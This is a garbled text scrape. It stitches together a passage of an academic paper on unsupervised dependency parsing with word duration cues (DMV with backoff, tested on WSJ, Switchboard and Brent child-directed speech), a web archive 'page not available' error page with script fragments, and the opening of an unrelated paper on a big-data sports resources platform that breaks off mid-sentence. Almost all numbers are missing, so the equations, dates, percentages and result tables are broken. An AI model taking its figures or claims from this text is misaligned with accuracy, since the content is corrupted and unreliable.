that children have access to the correct parts of speech when first learning syntactic structure. thus, we want a dmv variant that learns from words rather than pos tags. we therefore adopt several extensions to the dmv due to headden et al. ( ), described next. . the dmv with backoff headden et al. ( ) sought to improve the dmv by incorporating lexical information in addition to pos tags. however, arcs between particular words are rare, so they modified the dmv in two ways to deal with this sparsity. first, they switched from mle to a bayesian approach, estimating a probability distribu- tion over model parameters θ and dependency trees t given the training corpus c and a prior distribution α over models: p(t,θ|c,α). headden et al. avoided overestimating the proba- bility of rare events that happen to occur in the train- ing data by picking α to assign low probability to models θ which give high probability to rare events. accordingly, models that overcommit to rare events will contribute little to the final average over models. specifically, headden et al. use dirichlet priors, with α being the dirichlet hyperparameters. headden et al.’s second innovation was to adapt in- terpolated backoff methods from language modeling with n-grams, where one can estimate the probabil- ity of word wn given word wn− by interpolating between unigram and bigram probability estimates: p̂(wn|wn− ) = λp(wn|wn− ) + ( −λ)p(wn) with λ ∈ [ , ]. ideally, λ should be large when wn− is frequent, and small when wn− is rare. headden et al. ( ) apply this method to the dmv by backing off from choose and stop distributions that condition on both head word and pos to distributions that condition on only the head pos. in the equation above, λ is a scalar parameter. however, it actually specifies a probability distri- bution over the decision to back off (b) or not back off (¬b), and we can use different notation to reflect this view. specifically, λstop(·) and λchoose(·) will represent our backoff distributions for the stop and choose decision, respectively. using hp and dp to represent head and dependent pos tag and hw and dw to represent head and dependent word, one of the models headden et al. explored estimates: p̂ choose(dp|hw,hp,dir,val) = λchoose(¬b|hw,hp,dir)pchoose(dp|hw,hp,dir) +λchoose(b|hw,hp,dir)pchoose(dp|hp,dir) ( ) with an analogous backoff for pstop . we can see from equation that p̂choose backs off from a dis- tribution that conditions on hw to a distribution that marginalizes out hw, and that the extent of backoff varies across hw; we can use this to back off more when we have less evidence about hw. this model only conditions on words; it does not generate them in the dependents. this means it is actually a condi- tional, rather than fully generative, model of observed pos tags and unobserved syntax conditioned on the observed words. since identifying the true posterior distribution p(t,θ|c,α) is intractable, headden et al. use mean- field variational bayes (kurihara and sato, ; johnson, ), which finds an approximation to the posterior using an iterative em-like algorithm. in the e-step of vbem, expected counts e(ri ) are gathered for each latent variable using the inside-outside algo- rithm, exactly as in the e-step of traditional em. the maximization step differs from the m-step of em in two ways. first, the expected counts for each value of the latent variable xi are incremented by the hy- perparameter αi. second, the numerator and denom- inator are scaled by the function exp(ψ(·)), which reduces the probability of rare events. specifically, the pchoose distribution is estimated using expecta- tions for each arc adp,h,dir from head h to dependent pos tag dp in direction dir, and the update equation for pchoose from iteration n to n + is: p̂n+ choose(dp|h,dir) = exp(ψ(en(adp,h,dir ) + αdp,h,dir )) exp(ψ( ∑ c(e n(ac,h,dir ) + αc,h,dir ))) ( ) where h is the head pos tag for the backoff distri- bution, and the head (word, pos) pair for the no backoff distribution. the update equation for pstop is analogous. now consider the update equations for λchoose : λ̂n+ choose(¬b|hw,hp,dir) = exp(ψ(α¬b + ∑ c(e n(ac,hw,hp,dir )))) exp(ψ(αb + α¬b + ∑ c(e n(ac,hw,hp,dir )))) λ̂n+ choose(b|hw,hp,dir) = exp(ψ(αb)) exp(ψ(αb + α¬b + ∑ c(e n(ac,hw,hp,dir )))) only the ¬b numerator includes the expected counts, so as we see hw in direction dir more often, the ¬b numerator will swamp the b numerator. by picking αb larger than α¬b, we can bias our λ distribution to prefer backing off until we expect at least αb −α¬b arcs out of hw with tag hp in the direction of dir. to obtain good performance, headden et al. re- placed each word that appeared fewer than times in the training data with the token “unk.” we will also use such an unk cutoff. . dmv with duration we explore three models. one is a straightforward application of the dmv with backoff to words and (quantized) word duration, and the other two are fully- generative variants. we also consider using words and pos tags as input to these models. backoff mod- els are given two streams of information, providing two of word identity, pos tag, or word duration for each observed token. we call one stream the “back- off” stream, and the other the “extra” stream. backoff models learn a probability distribution conditioning on both streams, backing off to condition on only the backoff stream. our first words and duration model takes the du- ration as the extra stream and the word identity as the backoff stream, and, using ha to represent the acoustic information for the head, defines: p̂ choose(dw|hw,ha,dir) = λchoose(¬b|hw,ha,dir)pchoose(dw|hw,ha,dir) +λchoose(b|hw,ha,dir)pchoose(dw|hw,dir) ( ) with an analogous backoff scheme for pstop . we will refer to this conditional model as “cond.” in our experiments. this equation is similar to equation , except it uses words and duration instead of words and pos tags, and backs off to, not away from, words. we back off to the sparse words, rather than the less sparse duration, because duration provides almost no information about syntax in isolation. directly modelling the extra stream among the dependents may allow us to capture selectional re- strictions in pos and words models, or exploit ef- fects of syntactic predictability on dependent dura- tion. we therefore explore variants that generate both streams in the dependents. first, we examine a model (“joint”) that generates them jointly: p̂choose(dw,da|hw,hp,dir) = λchoose(¬b|hw,ha,dir) pchoose(dw,da|hw,ha,dir) +λchoose(b|hw,ha,dir) pchoose(dw,da|hw,dir) ( ) however, this joint model will have a very large state- space and may suffer from the same data sparsity, so we also explore a model (“indep.”) that generates the preliminary dev-set experiments confirmed this intuition, as models that backed off to word duration performed poorly. extra and backoff independently: p̂choose(dw,da|hw,hp,dir) = λchoose(¬b|hw,ha,dir) pchoose backoff (dw|hw,ha,dir) pchoose extra (da|hw,ha,dir) + λchoose(b|hw,ha,dir) pchoose backoff (dw|hw,dir) pchoose extra (da|hw,dir) ( ) we also modified the dmv with backoff to handle heavily lexicalized models. in headden et al. ( ), arcs between words that never appear in the same sentence are given probability mass only by virtue of the backoff distribution to pos tags, which all appear in the same sentence at least once. we want to both avoid relying on pos tags, and we also want to use held-out development and test sets to avoid implicitly overfitting the data when exploring different model structures. to this end, we add one extra αunk hyper- parameter to the dirichlet prior of pchoose for each combination of conditioning events. this hyperpa- rameter reserves probability mass for a head h to take a word dw as a dependent if h and dw never appeared together in the training data. the amount of probabil- ity mass reserved decreases as we see hw more often. this is implemented in training by adding αunk to the denominator of the pchoose update equation for each h and dir. at test time, if a word dw appears as an unseen dependent for head h, h takes dw as a dependent with probability: p̂ choose(dw|h,dir) = ( ) exp(ψ(αunk)) exp(ψ(αunk + ∑ c(e last(rc,h,dir ) + αc,h,dir ))) here, h may be a word, (word, pos) pair, or (word, duration) pair. since this event by definition never occurs in the training data, αunk does not appear in the numerator during training. note also that αunk is different from a global unk cutoff, which is imposed in preprocessing, and so effects every occur- rence of an an unk’d word in the model. αunk affects only dependents in pchoose , and treats a dependent as unk iff it did not occur on that particular side of that particular head word in any sentence. we used both global unk cutoffs (optimized on the dev set) and these αunk hyperparameters. train dev test w s j word tokens , , , word types , , sentences , s w b d n x t word tokens , , , word types , sentences , b r e n t word tokens , , , word types , sentences , table : statistics for our three corpora. finally, the conditional model ignores the extra stream in proot , and the generative models estimate proot over both streams jointly. experimental setup . datasets we evaluate on three datasets: wsj , sentences of length or less from the wall street journal por- tion of the penn treebank; swbdnxt , sentences of length or less from the switchboard dataset of ads used by pate and goldwater ( ); and brent, part of the brent corpus of cds (brent and siskind, ). table presents corpus statistics. . . wsj we present a new evaluation of the dmv with backoff on wsj , which does not have any acous- tic information, simply to verify that αunk performs sensibly on a standard corpus. additionally, headden et al. ( ) use an intensive initializer that relies on dozens of random restarts, and so, strictly speaking, only show that the backoff technology is useful for good initializations. our new evaluation will show that the backoff technology provides a substantial benefit even for harmonic initialization. wsj was created in the standard way; all punc- tuation and traces were removed, and sentences con- taining more than ten tokens were discarded. for our fully lexicalized version of wsj , all words were lowercased, and numbers were replaced with the token “number.” following standard practice, we used sections - for training, section for development, and section for test. wsj con- tains hand-annotated constituency parses, not depen- numbers were treated in this way only in wsj . dency parses, so we used the standard “constituency- to-dependency” conversion tool of johansson and nugues ( ) to obtain high-quality conll-style dependency parses. . . swbdnxt next, we evaluate on swbdnxt , which con- tains all sentences up to length from the same sections of the swbdnxt version of switchboard used by pate and goldwater ( ). short sentences are usually formulaic discourse responses (e.g. “oh ok”), so this dataset also excludes sentences shorter than three words. as our models successfully use word durations, this evaluation provides an important replication of the basic result from pate and goldwa- ter ( ) with a different kind of syntactic model. swbdnxt has a forced alignment of a dictionary-based phonetic transcription of each ut- terance to audio, providing our word duration infor- mation. as a very simple model of hyper-articulation and hypo-articulation, we classify a word as in the longest third duration, shortest third, or middle third. to minimize effects of word form, this classification was based on vowel count (counting a diphthong as one vowel): each word with n vowels is classified as in the shortest, longest, or middle tercile of duration among words with n vowels. like wsj , swbdnxt is annotated only with constituency parses, so to provide approximate “gold-standard” dependencies, we used the same constituency-to-dependency conversion tool as for wsj . we evaluated randomly-selected sen- tences to check the accuracy of the conversion tool, which was designed for newspaper text. excluding arcs involving words with no clear role in depen- dency structure (such as “um”), about % of the arcs were correct. while this rate is uncomfortably low, it is still much higher than unsupervised depen- dency parsers typically achieve, and so may provide a reasonable measure of relative dependency parse quality among competing systems. . . brent we also evaluated our models on the “large brent” dataset introduced in rytting et al. ( ), a por- tion of the brent corpus of child-directed speech (brent and siskind, ). we call this corpus brent. it consists of utterances from four of the mothers in brent and siskind’s ( ) study, and, like swbdnxt , has a forced alignment from which we obtain duration terciles. rytting et al. ( ) used a %/ % train/test partition. we extracted every ninth utterance from the original training partition to create a dev set, producing an %/ %/ % parti- tion. we also separated clitics from their base word. this dataset only has sentences longer than ten words, with a maximum length of words, so we discarded only sentences shorter than three words from the evaluation sets. the brent corpus is distributed via childes (macwhinney, ) with automatic dependency an- notations. however, these are not hand-corrected, and rely on a different tokenization of the dataset than is present on the transcription tier. to produce a reliable gold-standard, we annotated all sentences of length or greater from the development and test sets with dependencies drawn from the stanford typed dependency set (de marneffe and manning, ) using the annotation tool used for the copenhagen dependency treebank (kromann, ). . parameters in all experiments, hyperparameters for proot , pstop , and pchoose (and their backed-off distributions, and including αunk) were , αb was , and α¬b was . vbem was run on the training set until the data log-likelihood changed by less than . %, and then the parameters were held fixed and used to obtain viterbi parses for the evaluation sentences. finally, we explored different global unk cutoffs, replacing each word that appeared less than c times with the token unk. we ran each model for each c ∈ { , , , , }, and picked the best-scoring c on the development set for running on the test set and presentation here. we used a harmonic initializer similar to the one in klein and manning ( ). . evaluation in addition to evaluating the various incarnations of the dmv with backoff and input types, we compare to uniform branching baselines, the common cover link (ccl) parser of seginer ( ), and the unsu- pervised partial parser (upp) of ponvert et al. ( ). the upp produces a constituency parse from words available at http://homepages.inf.ed.ac.uk/s /brentdep/ and punctuation using a series of finite-state chun- kers; we use the best-performing (probabilistic right linear grammar) version. the ccl parser produces a constituency parse using a novel “cover link” rep- resentation, scoring these links heuristically. both ccl and upp rely on punctuation (though according to ponvert et al. ( ), upp less so), which our in- put is missing. the left-headed “lh” (right-headed “rh”) baseline assumes that each word takes the first word to its right (left) as a dependent, and corre- sponds to a uniform right-branching (left-branching) constituency baseline. we evaluate the output of all models in terms of both constituency scores and dependency accu- racy. our wsj and swbdnxt corpora are originally annotated for constituency structure, with the dependency gold standard derived as described above, while our brent corpus is originally anno- tated for dependency structure, with the constituency gold standard derived by defining a constituent to span a head and each of its dependents (ignoring any one-word “constituents”). as the ccl and upp parsers don’t produce dependencies, only con- stituency scores are provided. for constituency scores, we present the standard unlabeled precision, recall, and f-measure scores. for dependency scores, we present directed attach- ment accuracy, undirected attachment accuracy, and the “neutral edge detection” (ned) score intro- duced by schwartz et al. ( ). directed attachment accuracy counts an arc as a true positive if it correctly identifies both a head and a dependent, whereas undi- rected attachment accuracy ignores arc direction in counting true positives. ned counts an arc as a true positive if it would be a true positive under the undi- rected attachment score, or if the proposed head is the gold-standard grandparent of the proposed depen- dent. this avoids penalizing parses for flipping an arc, such as making determiners, rather than nouns, the head of noun phrases. to assess statistical significance, we carried out stratified shuffling tests, with , random shuf- fles, for all measures. tables indicate significance differences between the backoff models and the most competitive baseline model on that measure, indi- cated by an italic score. a star (∗) indicates p < . , and a dagger (†) indicates p < . . to see the direc- tion of a significant difference (i.e. whether backoff wsj swbdnxt dependency constituency dependency constituency unk dir. undir. ned p r f unk dir. undir. ned p r f e m wds . . . . . . . . . . . . pos — . . . . . . — . . . . . . v b wds . . . . . . . . . . . . pos — . . . . . . — . . . . . . w ds + p o s cond. . † . † . ∗ . † . † . † . † . † . . † . † . † joint . . . . † . . ∗ . † . . † . † . . † indep. . † . † . † . † . † . † . † . . † . † . † . † lh — . . . . . . — . . . . . . rh — . . . . . . — . . . . . . ccl — — — — . . . — — — — . . . upp — — — — . . . — — — — . . . table : performance on wsj and swbdnxt for models using words and pos tags only. bold scores indicate the best performance of all models and baselines on that measure. † significantly different from best non-uniform baseline (italics) by a stratified shuffling test, p < . ; ∗: p < . . model is better or worse than the baseline), look to the scores themselves. results in all results, when a model sees only one kind of information, that is expressed by writing out the ab- breviation for the relevant stream: “wds” for words, “pos” for part-of-speech, “dur” for word duration. for baseline models that see two streams, the abbre- viations are joined by a “×” symbol (as they treat input pairs as atoms drawn in the cross-product of the two streams’ vocabulary). for the backoff models, the abbreviations are joined by a “+” symbol (as they combine the information sources with a weighted sum), with the “extra” stream name first. . results: wsj the left half of table presents results on wsj . for the baseline models, the first column with hori- zontal text indicates the input, while for the backoff (wds+pos) models, the first column with horizontal text indicates whether and how the extra stream is modeled in dependents (as described in section . ). the em model with pos input is largely a repli- cation of the original dmv, differing in the use of separate train, dev, and test sets, and possibly the details of the harmonic initializer. our replication achieves an undirected attachment score of . on the test set, similar to the score of . reported by klein and manning ( ) when training and evalu- ating on all of wsj . cohen et al. ( ) use the same train/dev/test partition that we do, and report a directed attachment score of . , similar to our directed attachment score of . . the vb model which learns from pos tags does not outperform the em model which learns from pos tags, suggesting that data sparsity does not hurt the dmv when using pos tags. as expected, the words- only models perform much worse than both the pos input models and the uniform lh baseline. vb does improve the words-only constituency performance. the cond. and indep. backoff models outperform the pos-only baseline on all measures, but the joint backoff model does not demonstrate a clear advan- tage over the pos-only baseline on any measure. the success of the indep. model indicates that modelling dependent word identity does provide enough infor- mation to justify the increase in sparsity. the failure of the joint model to provide a further improvement indicates that the extra information in the full joint over dependents does not justify the large increase in parameters. we also see that several models out- perform the lh baseline on dependencies, but the advantage is much less in f-score, underscoring the loss of information in the conversion of dependen- cies to constituencies. finally, all models outperform ccl and upp on f-score, emphasizing their reliance on the punctuation we removed. dependency constituency unk dir. undir. ned p r f e m wds . . . . . . wds×dur . . . . . . v b wds . . . . . . wds×dur . . . . . . d ur + w ds cond. . † . . † . † . † . † joint . † . † . ∗ . † . † . † indep. . † . † . † . † . † . † lh — . . . . . . rh — . . . . . . ccl — — — — . . . upp — — — — . . . ● ● switchboard model performance undirected attachment score c o n st itu e n cy f − sc o re ● ● wds wdsxdur cond. joint indep. lh table : performance on swbdnxt for models using words and duration. the scatterplot includes a subset of the information in the table: f-score and undirected attachment accuracy for backoff models and vb and lh baseline. bold, italics, and significance annotations as in table . . results: swbdnxt the right half of table presents performance fig- ures on swbdnxt for input involving words and pos tags. as expected, the em and vb baselines perform best when learning from gold-standard pos tags, and we again see no benefit for the vb pos- only model compared to the em pos-only model. the pos-only baselines far outperform the uniform- attachment baselines on the dependency measures; to our knowledge this is the first demonstration outside the newspaper domain that the dmv outperforms a uniform branching strategy on these measures. the other comparisons among systems listed in table are largely inconclusive. models do com- paratively well on either the constituency or depen- dency evaluation, but not both. the backoff mod- els outperform the baseline pos-only models in the constituency evaluation, but underperform or match those same models in the dependency evaluation. conversely, most models outperform the lh base- line in the dependency evaluation, but not in the constituency evaluation. there are probably two causes for the ambiguity in these results. first, the noise in the dependency gold-standard may have over- whelmed any advantage from backoff. second, as we saw with wsj , the conversion from dependencies to constituencies removes information, which may explain the failure of any model to outperform the lh baseline in the constituency evaluation. table presents performance figures on swbdnxt for input involving words and duration, including a scatter-plot of undirected attachment against constituency f-score for the interesting comparisons. in the scatter-plot, models up and to the right performed better, and we see that the negative correlation between the dependency and constituency evaluations persists in words and dura- tion input. vb substantially outperforms em in the baselines, indicating that good smoothing is helpful when learning from words. other comparisons are again ambiguous; the dependency evaluation is noisy, and backoff models outperform baseline models on the constituency evaluation but not the lh baseline. still, the backoff models outperform all words-only baselines in constituency score, with two performing slightly worse in dependency score and one performing much better. so there is some evidence that word duration is useful, but we will find clearer evidence on the brent corpus. . results: brent table presents results on the brent dataset. vb is even more effective than in the other datasets for improving performance among baseline models, lead- ing to double-digit improvements on some measures. moreover, the best dev-set unk cutoff drops to for all vb models, indicating that, on this dataset, vb provides good smoothing even in models without backoff. this difference between datasets is likely related to differences in vocabulary diversity; the dependency constituency unk dir. undir. ned p r f e m wds . . . . . . wds×dur . . . . . . v b wds . . . . . . wds×dur . . . . . . d ur + w ds cond. . ∗ . ∗ . ∗ . . . ∗ joint . . . . . † . indep. . . † . † . † . . lh — . . . . . . rh — . . . . . . ccl — — — — . . . upp — — — — . . . ● ● brent model performance undirected attachment score c o n st itu e n cy f − sc o re ● ● wds wdsxdur cond. joint indep. lh table : performance on brent for models using words and duration. the scatterplot includes a subset of the information in the table: f-score and undirected attachment accuracy for backoff models and vb and lh baseline. bold, italics, and significance annotations as in table . type:token ratio in the brent training set is about : , compared to : and : in the wsj and swbdnxt training sets, respectively. more importantly for our main hypothesis, all three backoff models using words and duration out- perform the words-only baselines (including ccl and upp) on all dependency measures—the most accurate measures on this corpus, which has hand- annotated dependencies—and the cond. model also wins on f-score. conclusion in this paper, we showed how to use the dmv with backoff and two fully-generative variants to explore the utility of word duration in fully lexicalized un- supervised dependency parsing. although other re- searchers have incorporated features beyond words and pos tags into dmv-like models (e.g., semantics: naseem and barzilay ( ); morphology: berg- kirkpatrick et al. ( )), we believe this is the first example based on headden et al. ( )’s backoff method. as far as we know, our work is also the first test of a dmv-based model on transcribed conver- sational speech and the first to outperform uniform- branching baselines without using either pos tags or punctuation in the input. our results show that fully- lexicalized models can do well if they are smoothed properly and exploit multiple cues. our experiments also suggest that cds is espe- cially easy to learn from. model performance on the brent dataset was generally higher than on swbdnxt , with a much lower unk threshold. this latter point, and the fact that brent has a much lower word type/token ratio than the other datasets, suggest that cds provides more and clearer evidence about words’ syntactic behavior. finally, our results provide more evidence, using a different, more powerful syntactic model than that of pate and goldwater ( ), that word duration is a useful cue for unsupervised parsing. we found that several ways of incorporating duration were use- ful, although the extra sparsity of joint emissions was not justified in any of our investigations. our results are consistent with both the prosodic and pre- dictability bootstrapping hypotheses of language ac- quisition, providing the first computational support for these using a full syntactic parsing model and tested on child-directed speech. while our models do not provide a mechanistic account of how children might use duration information to help with learning syntax, they do show that this information is useful in principle, even without any knowledge of latent prosodic structure or its relationship to syntax. in ad- dition, our results suggest it may be useful to explore using word duration to enrich nlp tasks in speech- related technologies, such as syntactically-inspired language models for text-to-speech generation. in the future, we also hope to investigate why duration is helpful, designing experiments to tease apart the role of prosody and predictability in learning syntax. references matthew aylett and alice turk. . the smooth signal redundancy hypothesis: a functional explanation for re- lationships between redundancy, prosodic prominence, and duration in spontaneous speech. language and speech, ( ): – . mary beckman and janet pierrehumbert. . intona- tional structure in japanese and english. phonology yearbook, : – . alan bell, jason m brenier, michelle gregory, cynthia girand, and dan jurafsky. . predictability effects on durations of content and function words in conver- sational english. journal of memory and language, : – . taylor berg-kirkpatrick, alexandre bouchard-côté, john denero, and dan klein. . painless unsupervised learning with features. in proceedings of naacl. michael r brent and jeffrey m siskind. . the role of exposure to isolated words in early vocabulary de- velopment. cognition, : – . christos christodoulopoulos, sharon goldwater, and mark steedman. . turning the pipeline into a loop: iterated unsupervised dependency parsing and pos in- duction. in proceedings of the naacl-hlt workshop on the induction of linguistic structure, pages – , montréal, canada, june. association for computational linguistics. shay b cohen and noah a smith. . shared lo- gistic normal distributions for soft parameter tying in unsupervised grammar induction. in proceedings of naacl. shay b cohen, kevin gimpel, and noah a smith. . logistic normal priors for unsupervised probabilistic grammar induction. in advances in neural information processing systems . shay b cohen, dipanjan das, and noah a smith. . unsupervised structure prediction with non-parallel multilingual guidance. in proceedings of emnlp. marie-catherine de marneffe and christopher d manning. . stanford typed dependencies manual. technical report. markus dreyer and izhak shafran. . exploiting prosody for pcfgs with latent annotations. in proceed- ings of interspeech, antwerp, belgium, august. susanne gahl and susan m garnsey. . knowledge of grammar, knowledge of usage: syntactic probabilities affect pronunciation variation. language, : – . susanne gahl, susan m garnsey, cynthia fisher, and laura matzen. . “that sounds unlikely”: syntac- tic probabilities affect pronunciation. in proceedings of the th meeting of the cognitive science society. lila gleitman and eric wanner. . language acqui- sition: the state of the art. in eric wanner and lila gleitman, editors, language acquisition: the state of the art, pages – . cambridge university press, cam- bridge, uk. will headden, mark johnson, and david mcclosky. . improved unsupervised dependency parsing with richer contexts and smoothing. in proceedings of naacl- hlt. zhongqiang huang and mary harper. . appropri- ately handled prosodic breaks help pcfg parsing. in proceedings of naacl-hlt, pages – , los ange- les, california, june. association for computational linguistics. richard johansson and pierre nugues. . extended constituent-to-dependency conversion for english. in proceedings of nodalida . mark johnson. . why doesn’t em find good hmm pos-taggers. in proceedings of emnlp-conll, pages – . jeremy g kahn, matthew lease, eugene charniak, mark johnson, and mari ostendorf. . effective use of prosody in parsing conversational speech. in proceed- ings of hlt-emnlp, pages – . dan klein and christopher d. manning. . corpus- based induction of syntactic structure: models of de- pendency and constituency. in proceedings of acl, pages – . matthias trautner kromann. . the danish depen- dency treebank and the dtag treebank tool. in pro- ceedings of the second workshop on treebanks and linguistic theories, pages – . kenichi kurihara and taisuke sato. . variational bayesian grammar induction for natural language. in proceedings of the international colloquium on gram- matical inference, pages – . brian macwhinney. . the childes project: tools for analyzing talk. lawrence erlbaum associates, mah- wah, nj, third edition. séverine millotte, roger wales, and anne christophe. . phrasal prosody disambiguates syntax. lan- guage and cognitive processes, ( ): – . james l morgan, richard p meier, and elissa l newport. . structural packaging in the input to language learning: contributions of prosodic and morphologi- cal marking of phrases to the acquisition of language. cognitive psychology, : – . tahira naseem and regina barzilay. . using seman- tic cues to learn syntax. in proceedings of aaai. john k pate and sharon goldwater. . unsupervised syntactic chunking with acoustic cues: computational models for prosodic bootstrapping. in proceedings of the nd acl workshop on cognitive modeling and computational linguistics. elias ponvert, jason baldridge, and katrin erk. . simple unsupervised grammar induction from raw text with cascaded finite state models. in proceedings of acl-hlt. patti j price, mari ostendorf, stefanie shattuck-hufnagel, and cynthia fong. . the use of prosody in syntac- tic disambiguation. in proceedings of the hlt work- shop on speech and natural language, pages – , morristown, nj, usa. association for computational linguistics. c anton rytting, chris brew, and eric fosler-lussier. . segmenting words from natural speech: subseg- mental variation in segmental cues. journal of child language, ( ): – . roy schwartz, omri abend, roi reichart, and ari rap- poport . . neutralizing linguistically problematic annotations in unsupervised dependency parsing evalu- ation. in proceedings of the th acl, pages – . yoav seginer. . fast unsupervised incremental pars- ing. in proceedings of acl. amanda seidl. . infants’ use and weighting of prosodic cues in clause segmentation. journal of mem- ory and language, ( ): – . valentin i spitkovsky, hiyan alshawi, angel x chang, and daniel jurafsky. a. unsupervised dependency parsing without gold part-of-speech tags. in proceed- ings of emnlp. valentin i spitkovsky, hiyan alshawi, and daniel jurafsky. b. punctuation: making a point in unsupervised dependency parsing. in proceedings of conll. harry tily, susanne gahl, inbal arnon, neal snider, anubha kothari, and joan bresnan. . syntactic probabilities affect pronunciation variation in sponta- neous speech. language and cognition, ( ): – . wp-p m- .ebi.ac.uk params is empty sys_ exception wp-p m- .ebi.ac.uk no params is empty exception params is empty / / - : : if (typeof jquery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/ . . /js/jig.min.js"][/script]'.replace(/\[/g,string.fromcharcode( )).replace(/\]/g,string.fromcharcode( ))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} page not available reason: the web page address (url) that you used may be incorrect. message id: (wp-p m- .ebi.ac.uk) time: / / : : if you need further help, please send an email to pmc. include the information from the box above in your message. otherwise, click on one of the following links to continue using pmc: search the complete pmc archive. browse the contents of a specific journal in pmc. find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/med/ paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) research on the construction of sports resources information platform based on big data wang shuangming , . malaysia university of science and technology kuala lumpur, malaysia . dean's office, xi'an siyuan university xi'an, china e-mail: @qq.com shi jianwei personnel office, xi'an siyuan university xi'an, china e-mail: @ qq.com fu shiqiu college of liberal arts xi'an siyuan university xi'an, china e-mail: @ qq.com xu wanlin sports departmen xi'an siyuan university xi'an, china e-mail: @ qq.com abstract—the rapid development of communication technology such as big data makes the integration and application of sports resource information become the key of sports informatization construction. the construction of sports resources information big data platform is of great significance to the integration of sports resources and the sharing of sports resources. the subject explores the related theory of sports resources, studies the present situation of the application of sports resources, constructs the overall construction framework of sports resources information big data platform, analyzes and designs the functions of each subsystem, and discusses the performance evaluation of sports resources information big data platform. keywords-big data; sports resources information; platform construction i. introduction a. the advent of big data era the state council's "outline for accelerating the development of big data" (guofa [ ] no. ) states: the convergence of information technology and economic society has led to the rapid growth of data. the data have become a national basic strategic resource. big data is increasingly being used globally, with an important impact on global production, circulation, distribution, consumption activities as well as economic operation mechanism, social life style and national governance ability.[ ] at present, china ranks first in the world in the scale of internet and mobile internet users with abundant data resource and application market advantages. breakthroughs have been made in key data technology research and development in some big data sectors. a number of internet innovative enterprises and innovative applications have emerged. some local governments have started big-data-related work. insisting on innovation-driven development, accelerating the deployment of big data and deepening the application of big data have become the inherent and necessary choices of stabilizing growth, promoting reforms, adjusting structure, benefiting people's livelihood, and promoting the modernization of government governance.[ ]big data technology opens up a whole new era of opportunities and challenges. big data is a data set featuring large capacity, multiple types, high speed access and high application value. it is rapidly evolving into collecting, storing and associating and analyzing a large amount of data with diverse sources and diverse formats, which will discover new knowledge, create new values and upgrade new capabilities in a new generation of information technology and service forms. [ ] big data is featured by massive scale, high-speed circulation and rich forms, which has been widely used and developed in it, aviation, e-commerce and other industries. big data complements and improves traditional data collection methods, which expands the breadth and depth of data usage. b. the development of sports informatization the emergence of "internet+" has promoted the innovation and development of information technology in the industry.[ ] "national fitness program ( - )" pointed out that we must promote depth integration between "internet+", big data and other information technology and the national fitness program, so as to facilitate the construction of national fitness public service information platform.[ ] the " th five-year plan for sports development" issued by general administration of sport of china affirmed that "internet+" has infused new vitality into sports development and should make full use of new technologies to develop various types of app to open up the customer market.[ ] under the guidance of the programmatic documents, sports informatization has made some progress. international conference on sensor network and computer engineering (icsnce ) c. sports resources integration needs "the contradiction between the growing mass sports demand and the relative insufficiency of social sports resources "[ ] has become increasingly acute. relevant statistics show that the number of people who regularly participate in physical exercise in china has increased by . % in the recent seven years, while that of sports supported by public finance has dropped by . %. on the one hand, there are largely idle sports facilities which are heavily subsidized by the government for large- scale sporting events. most sports venues built by individuals or social groups are poorly equipped with few visitors, and the utilization rate of sports facilities in schools and enterprises is low; on the other hand, residents can not find a place suitable for exercise. the reasons are as follows: first, the distribution of public sports resources is not balanced; second, the dislocation of supply and demand of sports resources "aristocratic supply" and "civilian needs"; third, the information asymmetry of supply and demand of sports resources. taking "internet+" as an opportunity, we shall use big data technology to build a sports resource information platform to precisely match users and sports resources and improve the utilization rate of sports resources and satisfaction of all parties. ii. overview of sports resources big data a. sports informatization the ultimate goal of sports development is to better provide the public with satisfying sports products and services. the matching degree between sports informationization and public demand can most directly reflect the construction results of sports. judging from the current situation of the development of sports informationization, there is still a big gap between sports information service and public demand, which is mainly manifested in the following three aspects: ) less capable of collaborative development:sports information management agencies are always at a low level, we do not attach importance to the training and stability of the sports information personnel, with the lack of necessary follow-up financial security. sports information construction is not highly motivated by the management level, operational level and the implementation level or with inconsistent understanding, and there is no system or mechanism to organize and coordinate the relationship among the government, sports departments and the masses, leading to the lack of sustainable development of sports information construction. ) the level of information technology application is generally low:due to the fragmentation of the application of sports information technology, the poor circulation of information resources and the low involvement of new technologies, the scientification degree of sports management, planning, development and decision-making is low. the success stories of sports information systems are few, also with the lack of key projects promoted by works in all areas. ) inefficient access to service information:the growth of service resources failed to meet the growing public demand and public satisfaction was poor. on the one hand, the release of service information is often limited to the news media, policy documents, government websites, etc. the coverage and transmission speed of information are affected to some extent, and the public can not obtain real-time, comprehensive and accurate service information through mobile terminals. on the other hand, there are too few valuable service functions available online, resulting in low public participation. as for the specific sports resources big data, it also faces many challenges. the problems that need to be solved are as follows: the old and new software and hardware systems are difficult to integrate in depth, and the applications and data based on the system are featured by low relevance and poor sharing; unscientific data classification and low data utilization; large differences among data formats and serious data redundancy. sports resource information big data content is huge, which involves a large number of departments, so we shall properly solve the above problems and make the sports resources information database to better serve the public. b. concept of sports resource information platform based on big data the information technology is used to mine the information contained in the big data of sports resources and store the information according to certain rules, so that a massive sports information database is constructed, and a multi-user information platform is constructed based on the sports resources information database. such a platform is called sports resources information big data platform. iii. analysis and design of sports resource information platform based on big data a. construction principles of sports resource information platform based on big data the construction principles of sports resource information platform based on big data include: ) unity:the development of a unified technical specifications. the construction of the sports resources information platform based on big data must adopt a unified technology architecture, so as to ensure the smooth implementation of the system and good application results. ) security: the platform security is the lifeblood of the platform, so we should attach great importance to platform application security, data security and overall security in the platform implementation process. upholding the principle of reliability, we shall to the maximum extent possible avoid business failures due to technical failure. international conference on sensor network and computer engineering (icsnce ) ) reliability: the platform should use mature technologies and interfaces to make full use of the existing sports resource applications to avoid the construction risk and the use risk of the platform due to technical defects. ) scalability: the sports resource information platform based on big data should be designed and developed based on the needs of the sports management department, sports resource providers and sports resource users, and should give full consideration to the adaptability of the platform to the business changes of all stakeholders. the platform design and development may reduce the impact of business changes on the platform and achieve stable support for business changes through proper expansion and simple modification of the platform. ) forward-looking: the platform construction should be forward-looking, and we must consider the needs of business updates in the next few years, learn from the advanced international and domestic experience, and adopt the successful technology of information platform construction so that the platform can reflect the advanced nature in the future. b. business framework of sports resource information platform based on big data with the deepening of the concept of "internet+", sports informationization has also been developed. sports administrations and sports industry management co., ltd. have basically constructed portals and app applications. we should build platforms on this basis and make overall planning in 